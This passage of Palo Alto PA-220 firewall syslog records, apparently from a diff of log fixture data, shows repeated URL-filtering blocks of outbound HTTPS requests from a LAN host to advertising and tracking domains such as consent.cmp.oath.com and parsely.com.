16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 
16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 
16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 
16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:54 PA-220 1,2018/11/30 
16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 
